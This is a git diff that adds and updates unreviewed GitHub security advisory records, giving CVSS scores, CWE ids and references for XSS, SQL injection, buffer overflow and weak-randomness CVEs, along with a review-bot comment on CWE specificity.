diff --git a/advisories/unreviewed/2026/02/GHSA-33jq-j95r-2gpj/GHSA-33jq-j95r-2gpj.json b/advisories/unreviewed/2026/02/GHSA-33jq-j95r-2gpj/GHSA-33jq-j95r-2gpj.json new file mode 100644 index 0000000000000..aff1e3b7028c3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-33jq-j95r-2gpj/GHSA-33jq-j95r-2gpj.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33jq-j95r-2gpj", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:34Z", + "aliases": [ + "CVE-2026-3063" + ], + "details": "Inappropriate implementation in DevTools in Google Chrome prior to 145.0.7632.116 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via DevTools. (Chromium security severity: High)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3063" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_23.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/485287859" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T23:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-34rh-x3gg-rqg4/GHSA-34rh-x3gg-rqg4.json b/advisories/unreviewed/2026/02/GHSA-34rh-x3gg-rqg4/GHSA-34rh-x3gg-rqg4.json new file mode 100644 index 0000000000000..6c7ba2fa97c7b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-34rh-x3gg-rqg4/GHSA-34rh-x3gg-rqg4.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34rh-x3gg-rqg4", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:33Z", + "aliases": [ + "CVE-2026-3041" + ], + "details": "A security vulnerability has been detected in xingfuggz BaykeShop up to 1.3.20. Impacted is an unknown function of the file src/baykeshop/contrib/article/templates/baykeshop/sidebar/custom.html of the component Article Sidebar Module. Such manipulation of the argument sidebar.content leads to cross site scripting. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3041" + }, + { + "type": "WEB", + "url": "https://github.com/xingfuggz/baykeShop/issues/1" + }, + { + "type": "WEB", + "url": "https://github.com/xingfuggz/baykeShop/issues/1#issue-3931488211" + }, + { + "type": "WEB", + "url": "https://github.com/xingfuggz/baykeShop" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347397" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347397" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757165" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T22:16:26Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2026/02/GHSA-3m9c-j7xc-gc2c/GHSA-3m9c-j7xc-gc2c.json b/advisories/unreviewed/2026/02/GHSA-3m9c-j7xc-gc2c/GHSA-3m9c-j7xc-gc2c.json
new file mode 100644
index 0000000000000..9835dc7c9b4fc
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-3m9c-j7xc-gc2c/GHSA-3m9c-j7xc-gc2c.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3m9c-j7xc-gc2c",
+ "modified": "2026-02-24T00:31:34Z",
+ "published": "2026-02-24T00:31:34Z",
+ "aliases": [
+ "CVE-2026-3044"
+ ],
+ "details": "A vulnerability has been found in Tenda AC8 16.03.34.06. This affects the function webCgiGetUploadFile of the file /cgi-bin/UploadCfg of the component Httpd Service. The manipulation of the argument boundary leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3044"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/master-abc/cve/issues/43"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347400"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347400"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757240"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.tenda.com.cn"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T00:16:19Z"
+ }
+}
\ No newline at end of file
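Review bot: `cwe_ids` in this new record carries only the class-level `CWE-119`, although `details` describes a stack-based buffer overflow in `webCgiGetUploadFile`; anyone filtering or triaging on the specific weakness will not match this advisory. Listing the specific entry next to the parent, `"CWE-119", "CWE-121"`, would follow what the reviewed advisories in this series do (CWE-1333 added beside CWE-400 for GHSA-2g4f-4pwh-qvx6). The new GHSA-972x-fv77-xf59 record has the same gap: its `details` says SQL injection but `cwe_ids` lists only `CWE-74`, where `"CWE-89"` would be the specific entry. Both records are unreviewed and presumably mirror the upstream NVD data, so the correction may belong at the source rather than in the sync.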
diff --git a/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json b/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json index 6e09c9e1285cf..7061cbba02884 100644 --- a/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json +++ b/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3r56-xx7r-cr9c", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69388" ], "details": "Missing Authorization vulnerability in cliengo Cliengo – Chatbot cliengo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cliengo – Chatbot: from n/a through <= 3.0.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json b/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json index 5d71126f9afd7..7f923978eeeba 100644 --- a/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json +++ b/advisories/unreviewed/2026/02/GHSA-43rm-rg7w-7rjf/GHSA-43rm-rg7w-7rjf.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-43rm-rg7w-7rjf", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68863" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zack Katz iContact for Gravity Forms gravity-forms-icontact allows Reflected XSS.This issue affects iContact for Gravity Forms: from n/a through <= 1.3.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:14Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json b/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json index c9d372c9ff3e2..ac5c3eb067186 100644 --- a/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json +++ b/advisories/unreviewed/2026/02/GHSA-4fwr-9c58-jg7x/GHSA-4fwr-9c58-jg7x.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4fwr-9c58-jg7x", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68856" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in keeswolters Mopinion Feedback Form mopinion-feedback-form allows DOM-Based XSS.This issue affects Mopinion Feedback Form: from n/a through <= 1.1.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { 
@@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:14Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json b/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json index 485a654633815..af5bd74f8d307 100644 --- a/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json +++ b/advisories/unreviewed/2026/02/GHSA-4pmr-jmj5-4gwv/GHSA-4pmr-jmj5-4gwv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4pmr-jmj5-4gwv", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-68495" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetEngine jet-engine allows Reflected XSS.This issue affects JetEngine: from n/a through <= 3.8.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:09Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json b/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json index ceee3bff547c1..979e39f99714c 100644 --- a/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json +++ b/advisories/unreviewed/2026/02/GHSA-5284-5qqc-v2w8/GHSA-5284-5qqc-v2w8.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5284-5qqc-v2w8", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-68037" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Atlas Gondal Export Media URLs export-media-urls allows Reflected XSS.This issue affects Export Media URLs: from n/a through <= 2.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json b/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json index cb83f3759f068..5ffed1cb9e4f6 100644 --- a/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json +++ b/advisories/unreviewed/2026/02/GHSA-57vf-72qj-2828/GHSA-57vf-72qj-2828.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-57vf-72qj-2828", - "modified": "2026-02-20T18:31:36Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:36Z", "aliases": [ "CVE-2025-69330" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jthemes Prestige prestige allows Reflected XSS.This issue affects Prestige: from n/a through < 1.4.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:20Z" 
diff --git a/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json b/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json index 0913f69239cb2..b77c607dc49f2 100644 --- a/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json +++ b/advisories/unreviewed/2026/02/GHSA-5j3p-mg5x-539j/GHSA-5j3p-mg5x-539j.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5j3p-mg5x-539j", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68847" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in itex iSape isape allows Reflected XSS.This issue affects iSape: from n/a through <= 0.72.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:13Z" diff --git a/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json b/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json index 09c5bcebbaacf..74eed527406ab 100644 --- a/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json +++ b/advisories/unreviewed/2026/02/GHSA-63v8-38hf-jrfm/GHSA-63v8-38hf-jrfm.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-63v8-38hf-jrfm", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69392" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in itex iMoney imoney allows Reflected XSS.This issue affects iMoney: from n/a through <= 0.36.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-6hhh-7cj8-7mp2/GHSA-6hhh-7cj8-7mp2.json b/advisories/unreviewed/2026/02/GHSA-6hhh-7cj8-7mp2/GHSA-6hhh-7cj8-7mp2.json new file mode 100644 index 0000000000000..2234915accd2a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6hhh-7cj8-7mp2/GHSA-6hhh-7cj8-7mp2.json 
@@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6hhh-7cj8-7mp2", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:34Z", + "aliases": [ + "CVE-2024-58041" + ], + "details": "Smolder versions through 1.51 for Perl uses insecure rand() function for cryptographic functions.\n\nSmolder 1.51 and earlier for Perl uses the rand() function as the default source of entropy, which is not cryptographically secure, for cryptographic functions.\n\nSpecifically Smolder::DB::Developer uses the Data::Random library which specifically states that it is \"Useful mostly for test programs\". Data::Random uses the rand() function.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-58041" + }, + { + "type": "WEB", + "url": "https://metacpan.org/release/BAREFOOT/Data-Random-0.13/source/lib/Data/Random.pm#L537" + }, + { + "type": "WEB", + "url": "https://metacpan.org/release/WONKO/Smolder-1.51/source/lib/Smolder/DB/Developer.pm#L221" + }, + { + "type": "WEB", + "url": "https://metacpan.org/release/WONKO/Smolder-1.51/source/lib/Smolder/DB/Developer.pm#L5" + }, + { + "type": "WEB", + "url": "https://perldoc.perl.org/functions/rand" + }, + { + "type": "WEB", + "url": "https://security.metacpan.org/docs/guides/random-data-for-security.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-338" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T00:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json b/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json index 302d95675b37d..dfceae67dc926 100644 --- a/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json +++ b/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-76g3-wv5g-g883", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22352" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PersianScript Persian Woocommerce SMS persian-woocommerce-sms allows Reflected XSS.This issue affects Persian Woocommerce SMS: from n/a through <= 7.1.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:34Z" diff --git a/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json b/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json index 9822ee51db2cf..615fd23954b78 100644 --- a/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json +++ b/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-877x-j2fm-2mw5", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69384" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdiscover Timeline Event History timeline-event-history allows Reflected XSS.This issue affects Timeline Event History: from n/a through <= 3.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { 
@@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:23Z" diff --git a/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json b/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json index 1e15d52fce9f8..bb415c1393c60 100644 --- a/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json +++ b/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8p6j-8fq8-23rr", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68880" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in peterwsterling Simple Archive Generator simple-archive-generator allows Reflected XSS.This issue affects Simple Archive Generator: from n/a through <= 5.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:15Z" diff --git a/advisories/unreviewed/2026/02/GHSA-972x-fv77-xf59/GHSA-972x-fv77-xf59.json b/advisories/unreviewed/2026/02/GHSA-972x-fv77-xf59/GHSA-972x-fv77-xf59.json new file mode 100644 index 0000000000000..6073652a622d4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-972x-fv77-xf59/GHSA-972x-fv77-xf59.json 
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-972x-fv77-xf59",
+ "modified": "2026-02-24T00:31:34Z",
+ "published": "2026-02-24T00:31:34Z",
+ "aliases": [
+ "CVE-2026-3042"
+ ],
+ "details": "A vulnerability was detected in itsourcecode Event Management System 1.0. The affected element is an unknown function of the file /admin/index.php. Performing a manipulation of the argument ID results in sql injection. The attack is possible to be carried out remotely. The exploit is now public and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3042"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ltranquility/cve_submit/issues/1"
+ },
+ {
+ "type": "WEB",
+ "url": "https://itsourcecode.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347398"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347398"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757226"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T00:16:18Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json b/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json
index 269016f3e5da1..5aaae199b54c3 100644
--- a/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json
+++ b/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-97g7-x3h6-6ccc", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-24943" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Conference grandconference allows Reflected XSS.This issue affects Grand Conference: from n/a through <= 5.3.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:38Z" diff --git a/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json b/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json index 9544e750c3d97..23f161b7ee06f 100644 --- a/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json +++ b/advisories/unreviewed/2026/02/GHSA-9mr9-pcmg-4xr7/GHSA-9mr9-pcmg-4xr7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-9mr9-pcmg-4xr7", - "modified": "2026-02-20T18:31:33Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:33Z", "aliases": [ "CVE-2025-53237" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Soflyy WP Wizard Cloak wp-wizard-cloak allows Reflected XSS.This issue affects WP Wizard Cloak: from n/a through <= 1.0.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:02Z" 
diff --git a/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json b/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json index 10798f0533acb..10b4b1f62ed27 100644 --- a/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json +++ b/advisories/unreviewed/2026/02/GHSA-9w4h-qf26-hvrv/GHSA-9w4h-qf26-hvrv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-9w4h-qf26-hvrv", - "modified": "2026-02-20T18:31:36Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:36Z", "aliases": [ "CVE-2025-69326" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms nex-forms-express-wp-form-builder allows Reflected XSS.This issue affects NEX-Forms: from n/a through <= 9.1.7.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:19Z" diff --git 